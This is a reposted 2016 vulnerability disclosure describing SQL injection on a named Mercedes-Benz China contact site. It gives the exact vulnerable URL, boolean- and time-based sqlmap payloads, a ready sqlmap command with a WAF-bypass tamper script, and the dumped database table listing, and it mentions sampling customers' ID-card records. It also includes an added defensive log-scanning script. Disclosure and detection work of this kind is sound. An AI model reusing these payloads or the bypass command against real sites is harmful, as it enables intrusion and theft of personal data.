神刀安全网

Vulnerability title: Automotive security: SQL injection on a Mercedes-Benz site, can affect a large amount of customer information (bypass WAF)

Vulnerability details

Disclosure status:

2016-04-21: Details have been sent to the vendor and are awaiting the vendor's handling
2016-04-21: The vendor has confirmed; details are disclosed to the vendor only
2016-05-01: Details disclosed to core white hats and experts in related fields
2016-05-11: Details disclosed to regular white hats
2016-05-21: Details disclosed to intern white hats
2016-06-05: Details disclosed to the public

Brief description:

Detailed description:

Injection point: https://contact.mercedes-benz.com.cn/brochure/step2/?model=16&language=cn

Code area
sqlmap identified the following injection point(s) with a total of 60 HTTP(s) requests:
---
Parameter: model (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: model=16) AND 8776=8776 AND (8606=8606&language=cn

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: model=16) AND (SELECT * FROM (SELECT(SLEEP(5)))Fzth) AND (7771=7771&language=cn
---
web server operating system: Linux
web application technology: Apache
back-end DBMS: MySQL 5.0.12

There is filtering in place.

When dumping the current database, the tamper script "between" has to be added!!!!

sqlmap.py -u "https://contact.mercedes-benz.com.cn/brochure/step2/?model=16&language=cn" --batch --random-agent --tamper=between --current-db
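As an added example (not part of the original report), a small Python checker that pulls the `model` parameter out of constructed access-log lines and flags the payload shapes shown above, including the `BETWEEN` rewrite that sqlmap's `between` tamper script substitutes for `=`, which is why a filter that only blocks `=` is not a fix. The allow-list check shows the control that actually closes the hole: `model` is a numeric id and must be rejected, or bound as an integer, before it reaches the query; the log lines and the BETWEEN form are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not from the original report). They reuse
# the payload shapes from the sqlmap output above plus the BETWEEN form that the
# "between" tamper script produces when it rewrites "A = B" as "A BETWEEN B AND B".
SAMPLE_LOG = """\
GET /brochure/step2/?model=16&language=cn
GET /brochure/step2/?model=16)%20AND%208776=8776%20AND%20(8606=8606&language=cn
GET /brochure/step2/?model=16)%20AND%208776%20BETWEEN%208776%20AND%208776%20AND%20(8606%20BETWEEN%208606%20AND%208606&language=cn
GET /brochure/step2/?model=16)%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))Fzth)%20AND%20(7771=7771&language=cn
GET /brochure/step2/?model=abc&language=cn
"""

# Allow-list: "model" is a numeric id, so anything else is rejected before it can
# reach SQL. This is the control that makes the WAF signature irrelevant.
MODEL_ID = re.compile(r"^[1-9][0-9]{0,9}$")

# Detection signatures for the injection shapes seen on this page: a raw
# tautology, its BETWEEN rewrite, and the time-based SLEEP() probe.
SIGNATURES = {
    "boolean_equals": re.compile(r"\b\d+\s*=\s*\d+", re.I),
    "boolean_between": re.compile(r"\b\d+\s+BETWEEN\s+\d+\s+AND\s+\d+", re.I),
    "time_sleep": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
}


def validate_model(value: str) -> bool:
    """True only if `value` is an acceptable model id under the allow-list."""
    return MODEL_ID.fullmatch(value) is not None


def classify_request(line: str) -> dict:
    """Decode the `model` parameter of one log line and report allow-list result and matched signatures."""
    path = line.split(" ", 1)[1]
    params = dict(parse_qsl(urlsplit(path).query, keep_blank_values=True))
    model = params.get("model", "")
    return {
        "model": model,
        "allowed": validate_model(model),
        "signatures": [name for name, rx in SIGNATURES.items() if rx.search(model)],
    }


def scan_log(text: str) -> list:
    """Classify every non-empty line of an access log."""
    return [classify_request(line) for line in text.splitlines() if line.strip()]


if __name__ == "__main__":
    for result in scan_log(SAMPLE_LOG):
        print(result)
```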

Code area
Database: db_contactnew
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| ci_statistical_page | 20997746 |
| ci_statistical_model | 1332505 |
| ci_statistical_brochure | 632541 |
| ci_statistical_pricelist | 194508 |
| ci_brochure | 135619 |
| bak_ci_preownd_20160315 | 43942 |
| ci_preownd | 42708 |
| ci_test_drive_20160415 | 39587 |
| ci_test_drive | 30309 |
| ci_newsletter | 4996 |
| ci_email | 4609 |
| ci_campaignairchina | 1906 |
| ci_arena_form | 643 |
| ci_dealer | 505 |
| ci_model_class | 485 |
| ci_city | 461 |
| ci_dealer_bak | 213 |
| ci_ib_modeldata_feature | 154 |
| ci_user_weiboapp | 91 |
| ci_model_preowned | 74 |
| ci_presale | 68 |
| ci_model_brochure | 54 |
| ci_model | 48 |
| ci_wallpaper | 48 |
| ci_z | 48 |
| ci_arena_events | 45 |
| ci_model_pricelist | 44 |
| ci_model_brand | 36 |
| ci_province | 34 |
| ci_ib_modeldata_technical | 27 |
| ci_model_bodytype | 22 |
| ci_user | 4 |
+---------------------------+---------+

That is not a small amount of data!

Let's look at some of the private information, more than 40,000 records:


Users' ID-card information; only 3 records are dumped as proof.


Proof of vulnerability:

Fix recommendation:

Copyright notice: when reposting, please credit the source: 路人甲@乌云
